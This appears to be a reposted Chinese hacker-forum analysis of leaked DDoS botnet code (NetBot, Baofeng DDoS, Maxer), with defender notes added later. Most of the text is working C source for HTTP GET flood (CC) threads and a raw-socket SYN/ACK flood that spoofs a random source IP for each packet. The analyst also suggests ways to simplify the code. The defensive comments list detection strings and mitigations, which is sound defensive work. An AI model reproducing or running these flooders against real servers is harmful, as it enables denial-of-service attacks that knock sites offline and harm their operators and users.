CC与D-DOS解析
//=================================================================================
分析者:alalmn—飞龙 BLOG:http://hi.baidu.com/alalmn
分析的不好请各位高手见谅花了几个小时分析的呵呵
在这里不得不说 很多代码只写了界面 服务端没代码(把代码删除了) 要发就全部发了 重点自己藏着
这就是中国程序员的通病 一时半会没办法克服
实际中的HTTP GET攻击就是CC
CC(http get flood)的定义可以用下面几句话进行描述:
1.利用代理服务器向受害者发起大量HTTP Get请求
2.主要请求动态页面,涉及到数据库访问操作
3.数据库负载以及数据库连接池负载极高,无法响应正常请求,导致系统不可用。
//=================================================================================
NetBot_Attacker.h
/*
unsigned long CALLBACK nocache_get(LPVOID dParam) //HTTP 空GET请求 不缓存,每回重新请求页面!
unsigned long CALLBACK null_get(LPVOID dParam) //缓存 Get Flood 空GET链接
客户机 HTTP 空GET请求=nocache_get NoCache Get Flood(缓存 Get Flood)=null_get
但是我不这样认为 从他函数的意思 来看正好相反(估计是NB在发布代码的时候做手脚的 NB老爱玩小动作)
真正的意思是 HTTP 空GET请求=null_get NoCache Get Flood(缓存 Get Flood)=nocache_get
doHTTP 这个地方其实我觉得没必要这么麻烦
可以这样 send(m_hSocket,szBuffer,sizeof(szBuffer) 直接发送就好了(不知道效果一样不呵呵)
*/
/*
 * doHTTP - send one HTTP request through WinINet and print the start of the reply.
 *
 * ServerName   host name or address handed to InternetConnect
 * port         TCP port (cast to WORD before use)
 * ActionFile   object/path handed to HttpOpenRequest
 * Method       HTTP verb handed to HttpOpenRequest
 * HttpHeaders  extra header lines; strlen() is applied, so it must not be NULL
 * FormData     request body; strlen() is applied, so it must not be NULL
 *
 * Returns the result of HttpSendRequest; stays false if wininet.dll could not
 * be loaded or any earlier step failed.
 *
 * wininet.dll is loaded and released on every call, and the WinINet entry
 * points are looked up by name with GetProcAddress instead of being linked.
 *
 * Defender notes:
 *  - The agent string given to InternetOpen is the constant "Hackeroo"; WinINet
 *    sends it as the User-Agent header, so it is a usable match string in
 *    proxy/WAF/IDS rules and in web-server log searches.
 *  - Because the APIs are resolved at run time, a binary built from this
 *    presumably does not list them in its import table; the name strings
 *    ("InternetOpenA", "HttpSendRequestA", ...) are what to look for instead.
 */
bool doHTTP(char* ServerName,DWORD port,char* ActionFile, char* Method,char* HttpHeaders, char* FormData)
{ //doHTTP("127.0.0.1",8080,"*(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html","GET","Cache-Control: no-cache\r\nReferer: http://www.baidu.com\r\n","");
    HMODULE hDll;
    LPVOID hSession,hConnect,hRequest;
    bool bSendRequest=false;
    char buf[1000];
    DWORD dwFlags; // despite the name, receives the byte count from InternetReadFile
    hDll = LoadLibrary("wininet.dll");
    if(hDll)
    {
        // Local function-pointer types for the WinINet calls resolved below.
        typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
        typedef LPVOID ( WINAPI * pInternetConnect ) ( LPVOID ,LPCTSTR ,WORD ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD);
        typedef LPVOID ( WINAPI * pHttpOpenRequest ) ( LPVOID ,LPCTSTR ,LPCTSTR ,LPCTSTR ,LPCTSTR ,LPCSTR FAR * ,DWORD ,DWORD);
        typedef BOOL ( WINAPI * pHttpSendRequest ) (LPVOID ,LPCSTR ,DWORD ,LPVOID,DWORD) ;
        typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ;
        typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID );
        pInternetOpen InternetOpen=NULL;
        pInternetConnect InternetConnect=NULL;
        pHttpOpenRequest HttpOpenRequest=NULL;
        pHttpSendRequest HttpSendRequest=NULL;
        pInternetCloseHandle InternetCloseHandle=NULL;
        pInternetReadFile InternetReadFile=NULL;
        // Resolve the ANSI entry points by name at run time.
        InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" );
        InternetConnect = (pInternetConnect ) GetProcAddress ( hDll, "InternetConnectA");
        HttpOpenRequest = (pHttpOpenRequest) GetProcAddress (hDll,"HttpOpenRequestA");
        HttpSendRequest = ( pHttpSendRequest ) GetProcAddress( hDll, "HttpSendRequestA" );
        InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle");
        InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile");
        // Open a WinINet session; the first argument is the agent (User-Agent) string.
        hSession = InternetOpen("Hackeroo",0, NULL, NULL, 0);
        if (hSession != NULL)
        {
            // Connect to the server; service type 3 is INTERNET_SERVICE_HTTP.
            hConnect = InternetConnect(hSession,ServerName,(WORD)port, NULL, NULL, 3, 0, 1);
            if (hConnect!= NULL)
            {
                // Create the request: HTTP/1.1, no referrer argument, Accept: */*.
                LPTSTR AcceptTypes[2]={"*/*",NULL};
                hRequest = HttpOpenRequest(hConnect,Method,ActionFile,"HTTP/1.1",NULL,(LPCTSTR*)AcceptTypes,0, 1);
                if (hRequest!= NULL)
                {
                    // Send the request with the caller's headers and body.
                    bSendRequest =HttpSendRequest(hRequest,HttpHeaders,strlen(HttpHeaders),FormData,strlen(FormData));
                    if (bSendRequest)
                    {
                        // Read at most 999 bytes of the response into the zeroed buffer and print it.
                        memset(buf,0,1000);
                        InternetReadFile(hRequest, buf,999, &dwFlags);
                        printf("%s",buf);
                    }
                }
            }
            // Close the handles, innermost first.
            if (hRequest)
                InternetCloseHandle(hRequest);
            if (hConnect)
                InternetCloseHandle(hConnect);
            if (hSession)
                InternetCloseHandle(hSession);
        }
        FreeLibrary(hDll);
    }
    return bSendRequest;
}
/***************************************************/
// nocache_get - thread routine that repeats an HTTP GET through doHTTP until
// the global stopfuck becomes non-zero, pausing 40 ms between requests.
// dParam is not used. fuckweb.FuckIP and stopfuck are defined outside this
// listing. Always returns 0.
//
// In this listing the URL-splitting code is commented out (the analyst's
// annotation inside the block explains why), so only `all` and `point` are
// written before the loop.
//
// Defender notes: every request carries the same fixed, nonsensical path
// literal, the same "Cache-Control: no-cache" header and the same Referer
// (http://www.baidu.com), on top of the constant User-Agent set in doHTTP.
// Any of these constants can be matched at a reverse proxy or WAF, and the
// request rate per client (one every ~40 ms per thread) is suitable for
// rate limiting.
unsigned long CALLBACK nocache_get(LPVOID dParam) // HTTP GET flood, no-cache variant: the page is requested afresh every time
{
    char all[100],ip[32],port[6],url[32],*point=NULL;
    int httpport=80;
    strcpy(all,fuckweb.FuckIP); // copy the configured target URL into the local buffer
    point=all;
    /*
    // Analyst's note: I think this section is unnecessary; all of this should already be handled on the client before it is sent over
    if(strstr(all,"http://")!=NULL) // look for the scheme prefix
    {// prefix present
    point=point+strlen("http://");// advance point past "http://"
    }
    if(strstr(point,":")!=NULL)// a ':' means an explicit port follows the host
    {
    memset(ip,0,sizeof(ip)); // zero the host buffer
    strncpy(ip,point,strcspn(point,":")); // copy the host part
    // strcspn gives the offset of the first ':'
    point=point+strcspn(point,":")+1; // advance point past the ':'
    if(strstr(point,"/")!=NULL) // a '/' ends the port and starts the path
    {
    memset(port,0,sizeof(port));
    strncpy(port,point,strcspn(point,"/"));
    httpport=atoi(port);
    point=point+strcspn(point,"/");
    memset(url,0,sizeof(url));
    strcpy(url,point); // copy the path
    }
    }
    else
    {
    if(strstr(point,"/")!=NULL)
    {
    memset(ip,0,sizeof(ip));
    strncpy(ip,point,strcspn(point,"/"));
    point=point+strcspn(point,"/");
    memset(url,0,sizeof(url));
    strcpy(url,point);
    }
    }
    */
    while(!stopfuck)
    {
        doHTTP(ip,
        httpport,
        "/*(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html",
        "GET",
        "Cache-Control: no-cache\r\nReferer: http://www.baidu.com\r\n",
        ""); // open the connection and send the request
        Sleep(40);
    }
    return 0;
}
// null_get - thread routine that splits the configured target URL into host,
// port and path, then repeats an HTTP GET through doHTTP until the global
// stopfuck becomes non-zero, pausing 40 ms between requests.
// dParam is not used. fuckweb.FuckIP and stopfuck are defined outside this
// listing. Always returns 0.
//
// The path is parsed into `url`, but the doHTTP call below passes an empty
// string as the path argument.
//
// Defender notes: every request carries "Cache-Control: no-cache" and a fixed
// Referer (http://www.google.com), plus the constant User-Agent set in doHTTP.
// These constants and the steady per-client request rate are what a WAF rule
// or rate limiter can key on.
unsigned long CALLBACK null_get(LPVOID dParam) // labelled "cached GET flood, empty GET" in the original listing
{
    char all[100],ip[32],port[6],url[32],*point=NULL;
    int httpport=80;
    strcpy(all,fuckweb.FuckIP); // copy the configured target URL into the local buffer
    point=all;
    if(strstr(all,"http://")!=NULL)
    {
        // Advance past the scheme prefix.
        point=point+strlen("http://");
    }
    if(strstr(point,":")!=NULL)
    {
        // "host:port/path" form: copy the host, then the port, then the path.
        memset(ip,0,sizeof(ip));
        strncpy(ip,point,strcspn(point,":"));
        point=point+strcspn(point,":")+1;
        if(strstr(point,"/")!=NULL)
        {
            memset(port,0,sizeof(port));
            strncpy(port,point,strcspn(point,"/"));
            httpport=atoi(port);
            point=point+strcspn(point,"/");
            memset(url,0,sizeof(url));
            strcpy(url,point);
        }
    }
    else // "host/path" form: same handling without a port; httpport stays 80
    {
        if(strstr(point,"/")!=NULL)
        {
            memset(ip,0,sizeof(ip));
            strncpy(ip,point,strcspn(point,"/"));
            point=point+strcspn(point,"/");
            memset(url,0,sizeof(url));
            strcpy(url,point);
        }
    }
    while(!stopfuck)
    {
        doHTTP(ip,
        httpport,
        "",
        "GET",
        "Cache-Control: no-cache\r\nReferer: http://www.google.com\r\n",
        "");
        Sleep(40);
    }
    return 0;
}
//=================================================================================
暴风DDOS.h
/*
 * moni_flood - thread routine that builds one raw HTTP/1.1 GET request as a
 * CString and then, until StopFlag == 1, repeatedly opens a TCP connection,
 * sends that request, closes the socket without reading a reply, and sleeps
 * for SleepTime.
 *
 * zIP, tgtIP, tgtPort, StopFlag, SleepTime, rsCS() and tcpConnect() are
 * defined outside this listing; rsCS presumably turns the path into a
 * CString (not shown, to be confirmed).
 *
 * Defender notes, all visible in the request text below:
 *  - there is no User-Agent header at all;
 *  - the Referer has the unusual shape "http://<host>:80/http://<host>";
 *  - "Connection: Close" and "Cache-Control: no-cache" are always present;
 *  - the client closes straight after sending, so the server sees requests
 *    whose responses are never read.
 * Each of these is a candidate for a WAF/IDS rule or a log query.
 */
void moni_flood() // labelled "IE cache" in the original listing
{
    CString url11,http,rhost;
    http = zIP;
    rhost = http;
    char *jj = "/";
    url11="GET "+rsCS(jj)+" HTTP/1.1\r\n" // page to request (the original comment gives /list.asp?id=*** as an example)
    +"Referer: http://"+rhost+":80/http://"+rhost // referring address, built from the target host itself
    +"\r\nHost: "+rhost // Host header
    +"\r\nConnection: Close" // no keep-alive
    +"\r\nCache-Control: no-cache"
    +"\r\n\r\n";
    while (1)
    {
        if (StopFlag == 1) // stop requested
        {
            ExitThread(0);
            return; // not reached: ExitThread does not return
        }
        SOCKET S=tcpConnect(tgtIP,tgtPort); // open a TCP connection to the configured server
        send(S,url11,url11.GetLength() ,0); // send the prepared request text
        closesocket(S); // close without reading the response
        Sleep(SleepTime); // pause between requests
    }
}
//=================================================================================
Maxer.h
/*
 * HTTP - thread routine that, despite its name and its original "HTTP cache
 * attack" label, never opens a TCP connection: it writes hand-built IP+TCP
 * headers with a forged source address to a raw socket (IP_HDRINCL). The
 * GET/POST text copied into szSendBuf is overwritten from offset 0 by those
 * headers before each send.
 *
 * dParam points to a DDOSINFO (target address and port); a local copy is made.
 * IP_HEADER, TCP_HEADER, PSD_HEADER, DDOSINFO, resolve(), checksum() and
 * IsStop are defined outside this listing. Returns 0 on socket set-up failure;
 * otherwise loops until IsStop == 1 and ends the thread with ExitThread(0).
 *
 * Per outer iteration: 24 packets, then Sleep(40).
 *
 * Defender notes - header fields that are constant or narrowly bounded here
 * and can seed a filter or detection rule:
 *  - IP identification field always set to 1 (assigned without htons);
 *  - TTL 128 at the sender;
 *  - TCP window 512;
 *  - flags are exactly SYN (0x02) or exactly ACK (0x10);
 *  - source port drawn from 0..1024;
 *  - every source-address octet drawn from 1..250.
 * Because sources are forged per packet, per-source blocklists do not help.
 * The usual controls are SYN cookies and dropping out-of-state ACKs at the
 * target, ingress filtering (BCP 38 / uRPF) at the originating network, and
 * upstream rate limiting or scrubbing. Raw sockets need administrative rights
 * on Windows, and desktop Windows releases restrict TCP over raw sockets, so
 * hosts able to run this as written are presumably a narrow set.
 */
DWORD WINAPI HTTP(LPVOID dParam) // labelled "HTTP cache attack" in the original listing
{
    srand((unsigned)time( NULL ));
    PDDOSINFO pddosinfo = (PDDOSINFO)dParam; // caller-supplied parameters
    DDOSINFO ddosinfo; // local copy of the parameters
    memcpy(&ddosinfo,pddosinfo,sizeof(DDOSINFO));// copy so the caller's struct is not referenced later
    WSADATA WSAData;// filled in by WSAStartup with Windows Sockets details
    WSAStartup(MAKEWORD(2,2) ,&WSAData);// request Winsock version 2.2
    SOCKET sendSocket;
    SOCKADDR_IN Sin; // destination address structure
    IP_HEADER ipHeader;
    TCP_HEADER tcpHeader;
    PSD_HEADER psdHeader;
    char szSendBuf[128]={0};
    if((sendSocket = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) // create a raw IP socket
    {
        printf("Socket Setup Error...\n");
        return 0;
    }
    BOOL flag=1;
    if(setsockopt(sendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) // IP_HDRINCL: the caller supplies the IP header itself
    {
        printf("Setsockopt IP_HDRINCL Error...\n");
        return 0;
    }
    int timeout = 3000;
    if(setsockopt(sendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) == SOCKET_ERROR) // send timeout of 3000 ms
    {
        printf("Setsockopt SO_SNDTIMEO Error...\n");
        return 0;
    }
    Sin.sin_family = AF_INET; // address family (must be AF_INET)
    Sin.sin_port=htons(ddosinfo.port); // destination port in network byte order
    Sin.sin_addr.S_un.S_addr=resolve(ddosinfo.addr); // destination address from resolve() (helper not shown)
    char src_ip[20] = {0};
    while(1)
    {
        if(IsStop==1)// stop requested
        {
            ExitThread(0);
            return 0; // not reached: ExitThread does not return
        }
        if (rand()%2==0) // pick one of two filler strings at random
            strcpy(szSendBuf,"GET / HTTP GET / HTTP GET / HTTP GET / HTTP GET / HTTP"); // GET filler text
        else
            strcpy(szSendBuf,"POST / HTTP POST / HTTP POST / HTTP POST / HTTP POST / HTTP"); // POST filler text
        for(int a=0;a<24;a++)
        {
            wsprintf( src_ip, "%d.%d.%d.%d", rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1 ); // format a forged source address, each octet in 1..250
            // A new source address is generated for every packet, so blocking by
            // source address is ineffective against this traffic.
            // Fill in the IP header
            ipHeader.h_verlen = (4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); // high nibble: IP version 4; low nibble: header length in sizeof(unsigned long) units
            ipHeader.tos = 0;
            ipHeader.total_len = htons(sizeof(ipHeader)+sizeof(tcpHeader)); // 16-bit total length in bytes: IP header + TCP header only
            ipHeader.ident = 1; // 16-bit identification, constant
            ipHeader.frag_and_flags = 0x40; // flags field; presumably Don't Fragment - depends on the IP_HEADER layout, confirm
            ipHeader.ttl = 128; // 8-bit time to live
            ipHeader.proto = IPPROTO_TCP; // 8-bit protocol
            ipHeader.checksum = 0; // 16-bit IP header checksum, zero while computing
            ipHeader.sourceIP = inet_addr(src_ip); // forged source address
            ipHeader.destIP = Sin.sin_addr.s_addr; // destination address
            // Fill in the TCP header
            tcpHeader.th_sport = htons(rand()%1025); // source port: random in 0..1024
            tcpHeader.th_dport = htons( ddosinfo.port ); // destination port
            tcpHeader.th_seq = htonl( rand()%900000000 + 1 ); // random sequence number
            tcpHeader.th_ack=rand()%3; // acknowledgement number: random 0..2, no byte-order conversion
            if (rand()%2 == 0) tcpHeader.th_flag=0x02; // SYN (TCP flag bits: 0x01 FIN, 0x02 SYN, 0x04 RST, 0x08 PSH, 0x10 ACK, 0x20 URG)
            else tcpHeader.th_flag=0x10; // ACK
            tcpHeader.th_lenres = (sizeof(tcpHeader)/4<<4|0); // header length in 4-byte words in the high nibble, reserved bits zero
            tcpHeader.th_win = htons(512); // window size
            tcpHeader.th_sum = 0; // checksum, zero while computing
            tcpHeader.th_urp = 0; // urgent pointer
            // Fill in the TCP pseudo-header (used only for the checksum, never sent)
            psdHeader.saddr = ipHeader.sourceIP; // forged source address
            psdHeader.daddr = ipHeader.destIP; // destination address
            psdHeader.mbz = 0;
            psdHeader.ptcl = IPPROTO_TCP; // protocol
            psdHeader.tcpl = htons(sizeof(tcpHeader)); // TCP length
            // Compute the TCP checksum over pseudo-header + TCP header
            memcpy( szSendBuf, &psdHeader, sizeof(psdHeader) );
            memcpy( szSendBuf + sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader) );
            tcpHeader.th_sum = checksum( (USHORT *) szSendBuf, sizeof(psdHeader) + sizeof(tcpHeader) );
            // Lay out IP header + TCP header in the buffer and compute the IP checksum
            memcpy( szSendBuf, &ipHeader, sizeof(ipHeader) );
            memcpy( szSendBuf + sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) );
            ipHeader.checksum = checksum( (USHORT *) szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader) );
            sendto(sendSocket, szSendBuf,sizeof(szSendBuf) + sizeof(ipHeader), 0, (struct sockaddr*)&Sin, sizeof(Sin)); // hand the packet to the raw socket
        }
        Sleep(40);
    }
    return 0;
}
//IE攻击
/*
 * IE - thread routine that fetches the configured URL through WinINet in a
 * loop: open a session, open the URL, read up to 999 bytes, close both
 * handles, then sleep 50 seconds (Sleep(50000)). The loop ends when
 * IsStop == 1, at which point wininet.dll is released and the thread exits.
 *
 * dParam points to a DDOSINFO whose addr field is used as the URL; a local
 * copy is made. DDOSINFO and IsStop are defined outside this listing.
 *
 * The WinINet entry points are looked up by name with GetProcAddress.
 *
 * Defender notes: the agent string given to InternetOpen is the constant
 * "CreateIE", which WinINet sends as the User-Agent header - a direct match
 * string for proxy/WAF rules and access-log searches. The flag value
 * 0x04000000 passed to InternetOpenUrl is INTERNET_FLAG_NO_CACHE_WRITE, so the
 * response is not stored in the local cache.
 */
DWORD WINAPI IE(LPVOID dParam)
{
    PDDOSINFO pddosinfo = (PDDOSINFO)dParam;
    DDOSINFO ddosinfo;
    memcpy(&ddosinfo,pddosinfo,sizeof(DDOSINFO));
    HMODULE hDll;
    LPVOID hInternet,hUrlHandle;
    char buf[1000],*retstr=NULL;
    retstr=buf;
    DWORD dwFlags; // despite the name, receives the byte count from InternetReadFile
    hDll = LoadLibrary("wininet.dll");
    // Local function-pointer types for the WinINet calls resolved below.
    typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
    typedef LPVOID ( WINAPI * pInternetOpenUrl ) ( LPVOID ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD);
    typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID );
    typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ;
    pInternetOpen InternetOpen=NULL;
    pInternetOpenUrl InternetOpenUrl=NULL;
    pInternetCloseHandle InternetCloseHandle=NULL;
    pInternetReadFile InternetReadFile=NULL;
    // Resolve the entry points by name at run time.
    InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" );
    InternetOpenUrl = (pInternetOpenUrl ) GetProcAddress ( hDll, "InternetOpenUrlA");
    InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle");
    InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile");
    while (1)
    {
        if (IsStop == 1)
        {
            // Stop requested: release the library and end the thread.
            FreeLibrary(hDll);
            ExitThread(0);
            return 0; // not reached: ExitThread does not return
        }
        // Open a WinINet session
        hInternet = InternetOpen("CreateIE",0, NULL, NULL, 0); // obtain a session handle; the first argument is the agent string
        if (hInternet != NULL)
        {
            hUrlHandle = InternetOpenUrl(hInternet, ddosinfo.addr, NULL, 0, 0x04000000, 0); // open the configured URL
            if (hUrlHandle!= NULL)
            {
                memset(buf,0,1000);
                InternetReadFile(hUrlHandle, buf,999, &dwFlags); // read at most 999 bytes of the response
                InternetCloseHandle(hUrlHandle);
                hUrlHandle = NULL;
            }
            InternetCloseHandle(hInternet);
            hInternet = NULL;
        }
        Sleep(50000);
    }
}
摘自红色黑客联盟(www.7747.net) 原文:http://www.7747.net/Article/200910/41882.html